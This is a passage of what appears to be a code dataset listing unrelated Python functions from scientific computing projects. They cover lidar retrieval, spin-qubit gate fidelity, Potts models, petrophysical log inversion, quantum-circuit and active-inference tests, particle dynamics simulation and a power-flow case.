WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)+Prof['HSRL Mol BG']\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)+Prof['HSRL Comb BG']\n \n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)+Prof['WV Online BG']\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)+Prof['WV Offline BG']\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)+Prof['O2 Online BG']\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)+Prof['O2 Offline BG']\n \n# # Optimization error. T is piecewise\n# OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n# +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n# +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n# +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n# +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n# +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n# +lam[0]*np.nansum(np.abs(np.diff(xS[:,0]))) \\\n# +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n# +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n# +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n# +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n# +lam[5]*np.nansum(np.abs(np.diff(xS[:,5]))) \n \n # Optimization error. T is piecewise slope\n OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n +lam[0]*np.nansum(np.abs(np.diff(np.diff(xS[:,0])))) \\\n +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n +lam[5]*np.nansum(np.abs(np.diff(xS[:,5])))\n \n return OptError", "def prove_NNE() -> Proof:\n # Optional Task 6.7b", "def skip_test(n):\n return k > 0 and magic * n * k**0.5 >= t4_ref", "def Char_Gate(NV,res ,B_field=400):\n\n\n #data = np.loadtxt(\"NV_Sim_8.dat\") #Placeholder data to test the script\n #NV = np.vstack((data[:,3],data[:,4]))\n #physical constants\n gamma_c = 1.071e3 #g-factor for C13 in Hz/G\n #Model parameters\n omega_larmor = 2*np.pi*gamma_c*B_field\n tau_larmor = 2*np.pi/omega_larmor\n tau = res[0]\n n_pulses = int(res[1]*2) #So that we do a pi -pulse\n\n Ix = 0.5 * np.array([[0,1],[1,0]])\n Iz = 0.5* np.array([[1,0],[0,-1]])\n H0 = (omega_larmor)*Iz\n exH0 =linalg.expm(-1j*H0*tau)\n\n\n M = np.zeros(np.shape(NV)[0])\n for idC in range(np.shape(NV)[0]):\n A= 2*np.pi*NV[idC,0]\n B= 2*np.pi*NV[idC,1] #Converts to radial frequency in Hz/G\n H1 = (A+omega_larmor) *Iz +B*Ix\n exH1 = linalg.expm(-1j*H1*tau)\n V0 = exH0.dot(exH1.dot(exH1.dot(exH0)))\n V1 = exH1.dot(exH0.dot(exH0.dot(exH1)))\n n0 = Calc_axis(V0)\n n1 =Calc_axis(V1)\n phi = np.real(2*np.arccos(np.trace(V0)/2))\n M[idC] = 1 - (1-np.dot(n0,n1))*np.sin(n_pulses * phi /2 )**2\n\n Signal = -M.prod()\n F = (1-(Signal+1)/2)\n return F", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def ORM1(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,DTCO,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dc2,Dk,Dpf],[HIc1,HIc2,HIk,HIpf],[DTc1,DTc2,DTk,DTpf],[1,1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=XMatrix[1] # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[2] # Volume of organic component\n\t\tPHIe=XMatrix[3] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def test_superposition_ud_cnot():\n program = dedent(\n \"\"\"\\\n register q0[0]\n register q1[1]\n H q1\n CNOT q1 q0\n \"\"\"\n )\n\n result = run(program, run_gate_array, return_distribution=True)\n assert isclose(result, [0.5, 0.0, 0.0, 0.5]).all()", "def test_active_inference_SPM_1a(self):\n array_path = os.path.join(os.getcwd(), DATA_PATH + \"vbx_test_1a.mat\")\n mat_contents = loadmat(file_name=array_path)\n\n A = mat_contents[\"A\"][0]\n B = mat_contents[\"B\"][0]\n C = to_arr_of_arr(mat_contents[\"C\"][0][0][:,0])\n obs_matlab = mat_contents[\"obs\"].astype(\"int64\")\n policy = mat_contents[\"policies\"].astype(\"int64\") - 1\n t_horizon = mat_contents[\"t_horizon\"][0, 0].astype(\"int64\")\n actions_matlab = mat_contents[\"actions\"].astype(\"int64\") - 1\n qs_matlab = mat_contents[\"qs\"][0]\n xn_matlab = mat_contents[\"xn\"][0]\n vn_matlab = mat_contents[\"vn\"][0]\n\n likelihoods_matlab = mat_contents[\"likelihoods\"][0]\n\n num_obs, num_states, _, num_factors = get_model_dimensions(A, B)\n obs = convert_observation_array(obs_matlab, num_obs)\n T = len(obs)\n\n agent = Agent(A=A, B=B, C=C, inference_algo=\"MMP\", policy_len=1, \n inference_horizon=t_horizon, use_BMA = False, \n policy_sep_prior = True)\n \n actions_python = np.zeros(T)\n\n for t in range(T):\n o_t = (np.where(obs[t])[0][0],)\n qx, xn_t, vn_t = agent.infer_states_test(o_t)\n q_pi, efe= agent.infer_policies()\n action = agent.sample_action()\n\n actions_python[t] = action\n\n xn_python = build_xn_vn_array(xn_t)\n vn_python = build_xn_vn_array(vn_t)\n\n if t == T-1:\n xn_python = xn_python[:,:,:-1,:]\n vn_python = vn_python[:,:,:-1,:]\n\n start_tstep = max(0, agent.curr_timestep - agent.inference_horizon)\n end_tstep = min(agent.curr_timestep + agent.policy_len, T)\n\n xn_validation = xn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n vn_validation = vn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n\n self.assertTrue(np.isclose(xn_python, xn_validation).all())\n self.assertTrue(np.isclose(vn_python, vn_validation).all())\n \n self.assertTrue(np.isclose(actions_matlab[0,:],actions_python[:-1]).all())", "def solveverlet(self,T,dt):\r\n t = 0.\r\n self.dt = dt\r\n self.n = int(T/dt)\r\n L = self.param[2]\r\n N = self.particles.size\r\n\r\n self.U = np.zeros([self.n])\r\n\r\n progress = t/T*100\r\n\r\n #JV: Here we define the number of the GxG grid that we will need to calcule the entropy, change in order to change the precision of this grid\r\n self.G = 7\r\n\r\n #JV: We create a list that will be useful for the walls submenu, that will help us in the border conditions of the wall, see in vel_verlet()\r\n self.bouncing = np.zeros(self.particles.size)\r\n\r\n if(self.param[4] == \"Subsystems\"): #JV: If we are on \"Subsystems\", we will count different the types of particles\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2]) #JV: When we are not in \"Subsystems\", we will have the same type of variable, but will only use the [:,:,0] (this is because numba has problems otherwise)\r\n\r\n self.entropy_val = 0\r\n\r\n #JV: If we are simulating the brownian simulation, we initialize the array that will keep track if the brownian particle goes through a wall\r\n if(self.param[4] == \"Brownian\"):\r\n self.wallcount = np.zeros([2])\r\n else:\r\n self.wallcount = np.zeros([2]) #JV: We have to keep both in the same type of variables, otherwise numba will have problems. So now this conditional block is quite poinless. TO-ERASE\r\n\r\n np.vectorize(lambda i: i.reset())(self.particles) #This line resets the particles to their initial position\r\n\r\n self.vel_verlet_on = True #JV: If it's true, it will compute with the velocity verlet algorithm, if it's not, it will compute with normal verlet\r\n\r\n self.Nlist = int(1*(self.particles.size)**(1/2)) #JV:This variable defines the number of close particles that will be stored in the list (go to close_particles_list() for more info)\r\n #print(self.Nlist)\r\n\r\n #X,Y,VX,VY has the trajectories of the particles with two indexes that\r\n #access time and particles, respectively\r\n self.X = np.vectorize(lambda i: i.r[0])(self.particles)\r\n self.Y = np.vectorize(lambda i: i.r[1])(self.particles)\r\n self.VX = np.vectorize(lambda i: i.v[0])(self.particles)\r\n self.VY = np.vectorize(lambda i: i.v[1])(self.particles)\r\n\r\n MX, MXT = np.meshgrid(self.X[:],self.X[:])\r\n MY, MYT = np.meshgrid(self.Y[:],self.Y[:])\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: we first calculate the matrix that contains in every row the indexs of the m closest particles\r\n\r\n if(self.vel_verlet_on == True):\r\n #JV: We define the variables that we will need in the velocity verlet algorithm\r\n print(\"Computing with the Velocity-Verlet algorithm\")\r\n X0 = self.X\r\n Y0 = self.Y\r\n VX0 = self.VX\r\n VY0 = self.VY\r\n\r\n X1 = self.X\r\n Y1 = self.Y\r\n VX1 = self.VX\r\n VY1 = self.VY\r\n\r\n MX, MXT = np.meshgrid(X0[:],X0[:],copy=False)\r\n MY, MYT = np.meshgrid(Y0[:],Y0[:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n a0 = (1/self.m)*np.transpose(fv(X0[:],Y0[:],dx,dy,r2,t/self.dt,False,self.param[2],self.particles.size,self.U,self.dt,self.close_list,self.Nlist,self.vel_verlet_on,self.R,self.param[3],self.param[4],self.param[5],self.grid,self.G,self.wallcount,self.X2))\r\n\r\n for i in range(0, self.n):\r\n r1 = np.array([X0,Y0]) + np.array([VX0,VY0])*dt + 0.5*a0*dt**2\r\n\r\n MX, MXT = np.meshgrid(r1[0,:],r1[0,:],copy=False)\r\n MY, MYT = np.meshgrid(r1[1,:],r1[1,:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(self.param[3] == \"Free!\"):\r\n #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n dx_v2 = (np.abs(dx.copy())-1*L)\r\n r2_v2 = dx_v2**2+dy**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n dy_v2 = (np.abs(dy.copy())-1*L)\r\n r2_v2 = dx**2+dy_v2**2\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n r2_v2 = dx_v2**2+dy_v2**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n\r\n #JV: call velocityverlet to compute the next position\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n X1,Y1,VX1,VY1,a1 = vel_verlet(t,dt,np.array([X0,Y0]),np.array([VX0,VY0]),a0,dx,dy,r2,self.close_list,self.m,self.R,L,N,self.param[3],self.param[4],self.param[7],self.param[8],self.param[9],self.U,self.Nlist,self.vel_verlet_on,self.param[5],self.grid,self.G,self.wallcount,self.X2,self.bouncing)\r\n\r\n #JV: Now we check where this particle is in a RxR grid, that will help us to calcule the entropy. We do not do this for the Brownian mode because we don't compute the entropy in that case.\r\n if(self.param[4] != \"Brownian\"):\r\n for h in range(0, N):\r\n if(self.param[4] == \"Subsystems\"):\r\n if(h < self.param[5]**2): #JV: self.param[5] stores the number of n1xn1 type 1 particles\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),0] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),1] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G))] += 1\r\n\r\n if(self.param[4] == \"Brownian\"):\r\n if(self.wallcount[0] == 0):\r\n self.X2 = np.append(self.X2,(abs(X1[N-1]))**2)\r\n else:\r\n self.X2 = np.append(self.X2,(L*self.wallcount[0]+(X1[N-1]))**2)\r\n self.entropy = np.append(self.entropy,self.entropy_val)\r\n\r\n t += dt\r\n\r\n self.X = np.vstack((self.X,X1))\r\n self.Y = np.vstack((self.Y,Y1))\r\n self.VX = np.vstack((self.VX, VX1))\r\n self.VY = np.vstack((self.VY, VY1))\r\n a0 = a1\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n VX0,VY0 = VX1,VY1\r\n\r\n #JV: Every amount of steps of time we calculate the entropy\r\n update_entropy = 2\r\n if(i % update_entropy == 0):\r\n\r\n self.entropy_val = 0\r\n sumagrid = np.sum(self.grid)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n sumagrid_subs = np.zeros([2])\r\n sumagrid_subs[0] = np.sum(self.grid[:,:,0]) #JV: Number of type-0 particles\r\n sumagrid_subs[1] = sumagrid - sumagrid_subs[0] #JV: Number of type-1 particles\r\n\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n for l in range(2):\r\n if ((self.grid[j,k,0]+self.grid[j,k,1]) != 0):\r\n # pji = float(self.grid[j,k,l])/(update_entropy*(self.grid[j,k,0]+self.grid[j,k,1]))\r\n pji = float((self.grid[j,k,l]/(sumagrid_subs[l]/(sumagrid_subs[0]+sumagrid_subs[1])))/(update_entropy*(self.grid[j,k,0]/(sumagrid_subs[0]/(sumagrid_subs[0]+sumagrid_subs[1])))+(self.grid[j,k,1]/(sumagrid_subs[1]/(sumagrid_subs[0]+sumagrid_subs[1])))))\r\n else:\r\n pji = 0\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji) #JV: We will only calculate the value when pji != 0\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n else:\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n pji = float(self.grid[j,k,0])/(update_entropy*sumagrid)\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji)\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2])\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n else:\r\n print(\"Computing with the Verlet algorithm\")\r\n\r\n #Generation of the precious position (backwards euler step)\r\n X1 = self.X\r\n Y1 = self.Y\r\n X0 = X1 - self.VX*dt\r\n Y0 = Y1 - self.VY*dt\r\n\r\n for self.i in range(0,self.n):\r\n #Call verlet to compute the next position\r\n X2,Y2 = self.verlet(t,dt,np.array([X0,Y0]),np.array([X1,Y1]))\r\n t = t + dt\r\n\r\n #Add the new positions to X,Y,VX,VY\r\n self.X = np.vstack((self.X,X2))\r\n self.Y = np.vstack((self.Y,Y2))\r\n self.VX = np.vstack((self.VX,(X2-X0)/(2*dt)))\r\n self.VY = np.vstack((self.VY,(Y2-Y0)/(2*dt)))\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n X1,Y1 = X2,Y2\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(self.i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n #Once the computation has ended, I compute the kinetic energy,\r\n #the magnitude of the velocity V and the temperature\r\n #(see doc for temperature definition)\r\n self.KE()\r\n self.V = np.sqrt((self.VX**2 + self.VY**2))\r\n self.T = (np.sum(self.V**2,axis=1)/(self.particles.size*2 - 2))\r\n\r\n #Generation of the MB functions, you can modify the definition by\r\n #changing the linspace points\r\n vs,a = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n a,ts = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n self.MB = (vs/(ts)*np.exp(-vs**2/(2*ts)))\r\n\r\n #JV: If we are on the Subsystems submenu, we will calculate the temperature and the MB distribution of both types of particles\r\n if(self.param[4] == \"Subsystems\"):\r\n\r\n #JV: 1st group of particles\r\n self.V1 = np.sqrt((self.VX[:,0:(self.param[5]**2)]**2 + self.VY[:,0:(self.param[5]**2)]**2))\r\n self.T1 = (np.sum(self.V1**2,axis=1)/((self.param[5]**2)*2 - 2))\r\n\r\n vs1,a1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n a1,ts1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n self.MB1 = (vs1/(ts1)*np.exp(-vs1**2/(2*ts1)))\r\n\r\n #JV: 2nd group\r\n self.V2 = np.sqrt((self.VX[:,(self.param[5]**2):self.particles.size]**2 + self.VY[:,(self.param[5]**2):self.particles.size]**2))\r\n self.T2 = (np.sum(self.V2**2,axis=1)/((self.particles.size-self.param[5]**2)*2 - 2))\r\n\r\n vs2,a2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n a2,ts2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n self.MB2 = (vs2/(ts2)*np.exp(-vs2**2/(2*ts2)))\r\n\r\n \"\"\"Here I generate the accumulated V,T and MB using lists, the reason I use lists is because if you append two numpy arrays\r\n to an empty numpy array, they merge instead of remaining separate. You could technically use splicing to save on memory\r\n but sacrificing cpu.\"\"\"\r\n\r\n self.Vacu = []\r\n self.Tacu = []\r\n self.MBacu = []\r\n self.Vacu.append(self.V[int(self.n/2),:])\r\n self.Tacu.append(np.sum(self.V[int(self.n/2),:]**2)/(self.particles.size*2 - 2))\r\n\r\n vs = np.linspace(0,self.V.max(),100)\r\n self.MBacu.append((vs/(self.Tacu[0])*np.exp(-vs**2/(2*self.Tacu[0]))))\r\n\r\n #This delta controls the time interval for accumulation, right now its every 5 units\r\n delta = 5./dt\r\n\r\n #This 40 that appers in these lines is the time from which I start accumulating\r\n #to ensure the system has reached equilibrium.\r\n for i in range(1,int((self.n-(40./dt))/delta)):\r\n self.Vacu.append(np.hstack((self.Vacu[i-1],self.V[int(40./dt)+int(i*delta),:])))\r\n self.Tacu.append(np.sum(self.Vacu[i]**2)/(self.Vacu[i].size*2 - 2))\r\n self.MBacu.append((vs/(self.Tacu[i])*np.exp(-vs**2/(2*self.Tacu[i]))))\r\n return", "def case():\r\n #ppc = {\"version\": '2'}\r\n ppc = {}\r\n ##----- Power Flow Data -----##\r\n ## system MVA base\r\n ppc[\"baseMVA\"] = 100.0\r\n\r\n ## bus data\r\n # bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin\r\n ppc[\"bus\"] = array([\r\n [1, 3, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [2, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [3, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [4, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [5, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [6, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [7, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [8, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [9, 1, 0, 0, 0, 